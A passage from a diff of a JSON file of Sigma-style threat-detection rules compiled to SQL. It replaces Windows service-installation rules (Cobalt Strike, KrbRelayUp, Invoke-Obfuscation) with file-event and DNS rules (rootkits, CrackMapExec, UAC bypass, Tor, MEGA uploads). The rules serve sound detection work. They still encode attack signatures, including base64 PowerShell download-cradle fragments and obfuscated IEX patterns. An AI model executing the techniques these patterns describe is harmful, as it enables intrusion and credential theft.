LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without 
many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR 
TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE 
'%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' 
ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the 
\"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition 
Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": 
"File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 
'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", 
+ "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath 
LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": 